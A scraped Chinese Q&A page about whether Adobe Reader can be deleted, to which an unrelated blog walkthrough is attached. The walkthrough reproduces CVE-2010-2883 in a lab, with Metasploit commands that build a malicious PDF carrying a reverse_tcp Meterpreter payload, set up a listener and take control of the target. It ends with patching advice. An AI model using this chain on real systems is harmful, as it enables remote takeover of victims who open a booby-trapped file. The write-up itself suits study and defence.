adobe reader 9.4.4mui是干嘛用的,可不可以删 了?

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了adobe reader 9.4.4mui是干嘛用的,可不可以删 了?相关的知识,希望对你有一定的参考价值。

这是一个pdf阅读软件,可以删除。删除对于电脑系统没有任何影响,而且它占用的空间比较大,如果电脑空间余地紧张删掉则更好。不过,删除之后,就无法打开看pdf文件了,如果需要,可以找一款容量小得多、免安装的pdf阅读器软件替代。 参考技术A 这个是查看PDF格式文件用得,删掉对电脑一点问题都不会有。如果你以后要阅读PDF文件了,再装一个小些的(1M多些)PDF阅读器就可以了本回答被提问者采纳 参考技术B Adobe Reader 是用于打开和使用在 Adobe Acrobat 中创建的 Adobe PDF 的工具。 虽然无法在 Reader 中创建 PDF,但是可以使用 Adobe Reader 查看、打印和管理 PDF。在 Reader 中打开 PDF 后,可以使用多种工具快速查找信息。如果您收到一个 PDF 表单,则可以在线填写并以电子方式提交。如果收到审阅 PDF 的邀请,则可使用注释和标记工具为其添加批注。使用 Reader 的多媒体工具可以播放 PDF 中的视频和音乐。如果 PDF 包含敏感信息,则可利用数字身份证或数字签名对文档进行签名或验证
9.4.0是其版本号
其它问题参考:
追问

那我要是删了,是不是就打不开PDF文件了呀?这个PDF文件常用嘛?

参考技术C ky追问

这是干嘛用的呀,原来电脑里好像没有,现在多了700多M呢。
不知道干嘛去的

[漏洞复现] CVE-2010-2883 Adobe Reader 打开pdf即刻中招

1、漏洞概述

在“漏洞界”,据称有两种大山是其他软件永远无法匹敌的,一个是Microsoft的Office套件,一个是Adobe的全家桶。这两家出的漏洞,无论在出洞频率、攻击危害性、或者是影响范围等多个维度来看,都直接将其他软件远远甩开。如果要较真起来,到底谁是“漏洞之王”?

相信Adobe一定能“摘得桂冠”。

Adobe全家桶里面的Adobe Flash Player、Adobe Reader、Adobe Acrobat等产品,可以说是“难兄难弟”了,每年都会贡献一大堆漏洞。很多人就会问,为什么就他们家的产品漏洞最多,别人家的呢?

其实,所有软件都或多或少有漏洞,没有绝对安全的软件,就看有没有人去挖掘而已。

Adobe系列因为桌面安装量非常庞大,而且官方似乎安全开发工作这块做的不是太好,大量的黑客或安全研究人员愿意投入更多的时间来“挖洞”,一个成熟可利用的Adobe 0day漏洞,价值连城毫不夸张。

这不,2018年2月份,Adobe Flash最新版就爆出CVE-2018-4878 高危漏洞,可导致电脑直接被getshell。而同一月份,思科旗下安全团队TALOS披露了Adobe Reader最新版存在远程代码执行漏洞(CVE-2018-4901),简单来说,“打开PDF文件可能导致被getshell”。目前,Adobe已经发布了针对此漏洞的安全补丁。

由于Adobe Reader CVE-2018-4901 暂时还没有成熟可用的渗透代码流传出来,所以目前并没有像Adobe Flash CVE-2018-4878 引起更广泛的关注。

但是,我们要注意一点的是,此时此刻,必定有很多黑客正在尝试写攻击代码,准备发起新一轮攻击。

虽然我们没法直接对最新CVE-2018-4901进行复现,但从学习的角度,可以拿一个非常经典的老漏洞 CVE-2010-2883 来进行实践。这枚漏洞年限已久,但可以直接做出“打开pdf即刻中招”的效果,可以说是“简单暴力”的典范了。

CVE-2010-2883漏洞原理:“Adobe Reader在处理CoolType字体文件的sing表时,存在栈溢出漏洞,当打开特制的恶意PDF文件时,可允许任意代码远程执行。”

影响版本:Adobe Reader 8.2.4 - 9.3.4


技术分享图片



目前,Kali Linux Metasploit已经集成了相关的漏洞利用代码,我们可以用较快的速度,对此漏洞进行复现。

2、漏洞复现环境

Kali Linux + Windows 7 sp1 
渗透机:Kali Linux (ip:172.16.70.216) 
靶机:Windows 7 sp1 (ip:172.16.70.199) 
软件:Adobe Reader 9.3.exe

注:此实验环境所用渗透机和靶机,跟之前文章所分享一致。为了节省大家实验时间,我将此实验涉及到的工具全部上传到网盘=> 
链接: https://pan.baidu.com/s/1585jIDZgRh7IzwE01dK-Bw 密码:ie8m


3、实验流程

①进入Kali Linux,使用Metasploit生成PDF木马文件

搜索Adobe渗透模块 
msf > search adobe_cooltype_sing 
调用渗透模块 
msf > use exploit/windows/fileformat/adobe_cooltype_sing/ 
查看模块详情 
msf exploit(adobe_cooltype_sing) > info

技术分享图片

调用meterpreter载荷,反向连接到渗透机 
msf  exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp 
设置Kali Linux的IP地址 
msf  exploit(adobe_cooltype_sing) > set LHOST 172.16.70.216 
设置本地监听端口 
msf  exploit(adobe_cooltype_sing) > set LPORT 8888 
设置带有后门程序的PDF文件 
msf  exploit(adobe_cooltype_sing) > set FILENAME PINGINGLAB.pdf 
执行渗透生成文件 
msf  exploit(adobe_cooltype_sing) > exploit 


技术分享图片


②将PDF木马文件拷贝至Kali Linux桌面

[email protected]:~# cp /root/.msf4/local/PINGINGLAB.pdf /root/Desktop/PINGINGLAB.pdf 

技术分享图片

③Metasploit开启shell监听会话,等待肉鸡上线

使用handler监听模块 
msf > use exploit/multi/handler 
回弹一个tcp连接 
msf  exploit(handler) > set payload windows/meterpreter/reverse_tcp 
设置监听IP地址(跟PDF木马文件一致) 
msf  exploit(handler) > set LHOST 172.16.70.216 
设置监听的端口(跟PDF木马文件一致) 
msf  exploit(handler) > set LPORT 8888 
开启监听 
msf  exploit(handler) > exploit 

技术分享图片

④在Windows 7安装Adobe Reader 9.3

技术分享图片

技术分享图片


技术分享图片


⑤将PDF木马文件拷贝到Windows 7并打开

技术分享图片

技术分享图片


⑥Metasploit获取shell会话,并用Meterpreter控制肉鸡

查看系统信息 
meterpreter > sysinfo 
查看当前用户 
meterpreter > getuid 
截屏 
meterpreter > screenshot

技术分享图片


技术分享图片

获取进程 
meterpreter > ps 
切换进程(考虑到这个漏洞利用过程,adobe reader会“卡壳”退出,所以需要快速切换到其他系统进程,这样会话才不会失效) 
meterpreter > migrate 3748 


技术分享图片技术分享图片

获取Dos Shell 
meterpreter > shell 
C:\Windows\system32>ipconfig 


技术分享图片

实验总结: 
可以看到,最终由于Adobe Reader 存在CVE-2010-2883这个高危漏洞,导致电脑打开特殊定制的pdf之后,直接变成肉鸡。与之前文章中的Office和Flash 0day漏洞类似,真实环境下,很多黑客会利用此方法,结合社会工程学,例如通过诱导邮件、各种论坛、QQ群、微信群等多渠道,诱导用户下载并打开,而只要打开的用户,就直接中招。

在这里也呼吁大家:平常要非常小心陌生办公文件,无论是pdf还是word等,打开之前一定要明确来源,或者用杀毒软件先杀毒,再打开。另外,就是尽量保证电脑的软件处于最新版,这样才能最大程度降低被攻击的几率。


4、漏洞修复

①直接到Adobe官网,下载Adobe Reader最新版本; 
②安装常见杀毒软件,开启实时防护和杀毒引擎实时升级。



相关推文:

[漏洞复现] MS17-010 基于"永恒之蓝"实现Windows Getshell

[漏洞复现] CVE-2017-11882 通杀所有Office版本

[漏洞复现] CVE-2017-16995 Ubuntu16.04

以上是关于adobe reader 9.4.4mui是干嘛用的,可不可以删 了?的主要内容,如果未能解决你的问题,请参考以下文章

silverlight是干嘛用的?

C#winform adobe PDF reader 控件

apache 这个软件是干嘛用?

耳机延长线是干嘛用的?

今日头条头条号图文发布页面的“扩展链接”是干嘛用的?

VPS是干嘛用的?有哪些知名牌子?与云服务器有什么区别?